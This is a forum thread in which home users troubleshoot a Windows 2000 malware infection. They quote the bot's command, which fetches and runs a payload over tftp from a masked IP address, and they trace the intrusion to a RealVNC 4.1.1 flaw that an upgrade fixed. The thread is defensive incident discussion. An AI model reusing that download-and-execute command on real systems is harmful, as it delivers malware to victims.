DOS (tftp) virus

Hi,

Not sure if anyone has encountered this virus and whether there is a fix. This virus has attacked my wife’s W2K Pro notebook (all securities etc up-to-date) running zonealarm (home free - all updates up to date) and avast (home/free edition - all updates up-to-date).

Periodiatically, the WINx (cmd) gets executed - the (cmd) black box comes up and the command [ tftp -i xxx.xxx.xxx.xxxx msqrsm.exe ] and a short while later it tries to run msqrsm. The ip address is different each time when this happens. I had already renamed the tftp command so it never gets executed and hence the pgm doesn’t get downloaded.

How do I find which program or service is the culprit (may be a valid winx service that was compromised??) and stop this nonsense from continuing??

A bit of background - I had noticed that her computer was acting eratically so I rebooted with a clean WINX LIVE CD and did a complete clean with avast of her HDD and in fact found several pgms that had been hit by a virus - the identified pgms were deleted - i then proceeded to clean the registry of the bad items - and did a manual cleanup of some dirs found in “program files” - the culprit seems to have been gray_pigeon_hacker.com.

Also, if possible, can anyone shed light on how this virus was able to infect even through zonealarm and avast (BTW: she also runs spywareblaster and spybot search& destroy)?? (So I can prevent this from happening again!!)

Thanks for any help in this regard.

Rgds. Otto.

I can confirm this experience my daughter’s desktop pc, Windows 2000, suddenly did the same and she managed to take some notes which I am deciphering. I have only just found this forum item with msqrsm:exe, I have deliberately inserted the colon.

However in our case an attempt was also made to download the program msinexecs:exe. of which I have been unable to find much information. Some hints found on a Norwegian site.

PC run Sygate personal Firewall, AVG free, Adaware, Spybot search and Destroy so far we don’t think we have found anything about where it originates.

Date noticed 19th or 20th September, in Belgium

I ask the same question, how can it get ‘out’ with the firewall running and giving no notice.

C

Hi aplcom and cylosine. Welcome to the forums.

@aplcom

There is information about msqrsm.exe here

http://virusinfo.prevx.com/pxparall.asp?PXC=e36042251362

@cylosine

I think msinexecs.exe might be related to this

http://fileinfo.prevx.com/fileinfo.asp?PXC=0e5033782633

You could both try the trial version of Prevx that you can download from

http://www.prevx.com/

The two options on the web page, “Clean and Protect My PC Now” and “Protect My PC Now” download the same file afaik.

A word of caution - Prevx is a powerful program and, because of this, it uses a lot of resources when running. In addition to removing some malware it’s also an IPS (intrusion prevention software) so it will sometimes block programs you want to run, or stop and ask if you want to allow a program to run. This can be annoying. But its software database, which is built on user input, is quite extensive so it will recognize most programs it encounters.

EDIT: BTW, aplcom, did avast! find and clean RBOT on your wife’s computer?

Hi Mauserme,

Thanks for the info. I will try the prevx stuff and see if that clears it up - else I may have no choice but to re-install (my last option!!).

I searched and looked for RBOT but saw no signs of it - unless you are referring to something else. When I ran from a clean ‘LIVE WIN CD’ it did clean up several programs that were attacked - I will upload the list once I get my hands on her computer (currently I’m on contract in Singapore and she is in HK !!) within the next few days.

I am still very curious how all this came about - running ZONEALARM & AVAST - how did her computer get infected. Was it via an email? or by visiting a website? or did someone simply target an attack on her IP and somehow compromised insecure aspects of WIN2000PRO??

Again thanks for the replies and helping cure this ill.

Rgds. Otto.

Hi,

I managed to access my wifes computer via VNC, and guess what? - prevx found 3 files that were virused - in system32 it found (shell32.exe, kernel32.exe and dc1.exe) - it cleaned them up. I then found these same entries in the registry (run as services and also in explorer bars) and proceeded to delete them. Seems that all is back to normal.

Surprised that AVAST did not catch these files - even after I scanned tham manually!!

Again thanks to mauserme.

Rgds. otto.

You’re welcome Otto. I’m glad it worked out this easily.

I don’t know if you noticed on the Prevx page, this was first seen in their community on September 17. Avast! probably does not have a signature yet (if you have it in the Prevx quarantine and you’re adventuresome you could send a sample).

As far as how it got past ZA, my guess is that its disguising itself as an allowed program or possibly, if it uses a name like IEXPLORE.EXE, your wife might have allowed the connection when ZA asked.

Keith

Hi Mauserme,

This link helped me get some more information , I am struggling to find much:
http://virusinfo.prevx.com/pxparall.asp?PXC=e36042251362

This link does not convince me it has to do with msinexecs.exe:
http://fileinfo.prevx.com/fileinfo.asp?PXC=0e5033782633

The info from aplcom is very interesting, looking at the files shows you don’t want to have them on your computer. The 3 files named are well known as bad ones, surprising that scanning with AVAST has not brought them to light. I do however know nothing much about AVAST. If these files are involved in our case it means that AVG can not find them either.

I have however not been able to convince myself that any of the files names I have seen are the original cause to the present problem, I see them as a result of another program has been started.

Which one or ones are still completely unclear, will wait patiently to see what emerges from the Internet.

C.

Hi cylosine,

The connection between msinexecs.exe and the Prevx link I posted in my response to you was actually drawn by Prevx rather than me

http://fileinfo.prevx.com/fileinfoweek.asp?mk=24/07/2006


http://img125.imageshack.us/img125/7158/prevxpagehz1.png

Waiting for additional information to become available may be a good approach because, as you say, there is very little on the web at the moment. You could also post a HijackThis log and we could ask Eddy to take a look.

Hi mauserme,

I went back to prevx once more and had much more luck.
http://fileinfo.prevx.com/adware/qqccf340481465-msin23040165/msinexecs.exe.html

Others interested, go same place and use the search facility to find more msinexecs.exe files, there is a heap of variations. Bad news is that it is a heavy duty version that is about at the moment.

Found enough information to convince myself that a bot controller is hanging around somewhere and has managed to fool our firewall.

HJT shows nothing, experts have looked and I have compared with a previous clear report and could not see anything suspicious.

The computer is in another continent so I have limited access, it is going to be a drawn out affair. I will report back as it goes on.

Found enough information to convince myself that a bot controller is hanging around somewhere and has managed to fool our firewall.

I didn’t notice you mentioned what firewall you use ?

Hardware firewalls don’t usually provide outbound protection nor does windows XP’s firewall.
Any malware that manages to get past your defences will have free reign to connect to the internet to either download more of the same, pass your personal data (sensitive or otherwise, user names, passwords, keylogger retrieved data, etc.) or open a backdoor to your computer, so outbound protection is essential.

HJT shows nothing, experts have looked and I have compared with a previous clear report and could not see anything suspicious.
Might be time for a look at Hidden things [url]http://invisiblethings.org[/url]

Maybe its just me but I still think its worth giving Prevx a try. From the url you posted, cylosine

“New Users: You can download the full Prevx1 product and use it to cleanup and remove MSINEXECS.EXE and other infections free of charge …”

I liked this program when it was a freeware.
I hate freewares becoming shareware.
I don’t trust (or like) companies that use this marketing policy.
Maybe it’s just me 8)

Waving with my hand…no Tech, it’s not just you :slight_smile: I also don’t like it

@DavidR,
I did mention the firewall right at the beginning, Sygate Personal Firewall (the free version) has been very handy. Your comments are correct and a bit disheartening. SPF certainly picks up two way traffic.

@mauserme,
I am contemplating Prevx and I did notice the offer. Just reluctant to use yet another.

Hi Mauserme (Keith),

Seems that I was barking up the wrong tree all along. The PREVX1 idea was good and it did help. However after my (premature) posting that all was well, the darn dos box popped up again and the tftp - i command started mysteriously executing again.

I finally got fed up and used ethereal to monitor the network and FINALLY found the culprit. Remember I said I fixed my wife’s computer via VNC - well guess what?? RealVNC (v4.1.1) had a security flaw in it and it was able to be compromised. Once I upgraded to v4.1.2 (flaw corrected) the problem has disappeared for good!!! Check out this site for more info.

http://www.intelliadmin.com/blog/2006/05/vnc-flaw-proof-of-concept.html

Again, much thanks Keith for your help and time.

Rgds. Otto.

Hi aplcom,

Congratulations!! 8) The last thing I would have focused on.

Great piece of work, my daughter at the time with 95% probability was running the vnc4.1.1 server to allow me to log in. Great mistake starting it up with the computer, as we rarely use it but I thought it was safe so when I saw it running a few weeks ago when in Europe I did not think much about it. I had been wondering about if you would come back and tell that you still had the problem, I did not feel confident this was the cause you were finding, but I did not know enough to question your finding.

Naturally vnc is set to go through the firewall. I feel much better apart from the stupid thing of letting vnc run needlessly but of course the idea was I can connect whenever she is on line.

Did you work out from the packet sniffing where the origin IP was of the controller? By the way I am no expert on packet sniffing only have the program and used it trying to figure out why my IP phone would not connect to another IP address on the same ISP network. (IP direct to IP no middleman)

Many thanks for coming to the forum sharing your information. I feel much relieved on this occasion. Will update and rename tftp as well.

C.

Very nice indeed, Otto. Thanks for the update.

Hi Cylosine,

I used ethereal to monitor the traffic once the run command was executed - then analysed the packet data offline. I was able to see that it was port 5900 (VNC) that was being compromised (thankfully not if full screen mode - rather strictly in command mode!!!) hence the culprit was trying to further compromise the system by downloading the worm programs and backdoors. This is a relatively new exploit so thankfully no damage was done.

I did do a trace back and found the offending IP - reported it plus the logs to the ISP - but I doubt that anything will come of it. Its a hackers world!!! (At least on Win-x machines - I have no probs whatsoever on my linux boxes!!!)

It is a good idea to rename or move programs like ftp, tftp, cmd.exe (or simply lock them altogether). Also a good idea to do a thorough check with AVAST as well as PREVX1 (Thanks to Keith!!). You can also checkout nmap as well as grc.com to check what can get through your computer ip & ports.

Good luck and hope this also solves your problem.

Rgds. Otto.

I hate that too. But it’s still a good program, imo, even if the markteting strategy stinks :slight_smile:

Other programs could do the same or better being freeware (or, at least, having a Lite or free version).
For instance: System Safety Monitor (http://syssafety.com/) :slight_smile: